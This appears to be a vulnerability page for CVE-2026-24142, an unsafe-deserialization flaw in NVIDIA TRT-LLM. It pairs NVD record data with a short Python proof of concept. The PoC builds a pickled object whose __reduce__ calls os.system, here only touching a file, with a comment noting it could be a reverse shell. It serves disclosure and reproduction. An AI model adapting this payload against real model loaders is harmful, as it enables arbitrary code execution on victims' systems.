CVE-2026-24142

import pickle import os # Define a malicious class that executes code upon deserialization class MaliciousPayload: def __reduce__(self): # Command to execute (e.g., creating a file or reverse shell) return (os.system, ('touch /tmp/poc_success',)) # Serialize the malicious object malicious_data = pickle.dumps(MaliciousPayload()) # Simulate writing to an unsafe handle/file that TRT-LLM might load with open('malicious_model.handle', 'wb') as f: f.write(malicious_data) print("Malicious handle generated. If TRT-LLM loads this, code will execute.")

{"cve": {"id": "CVE-2026-24142", "sourceIdentifier": "[email protected]", "published": "2026-05-20T04:16:44.993", "lastModified": "2026-05-20T13:57:15.740", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA TRT-LLM for any platform contains a deserialization vulnerability and unsafe serialized handle. A successful exploit of this vulnerability might lead to code execution, data tampering, and information disclosure."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.0, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24142", "source": "[email protected]"}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5805", "source": "[email protected]"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-24142", "source": "[email protected]"}]}}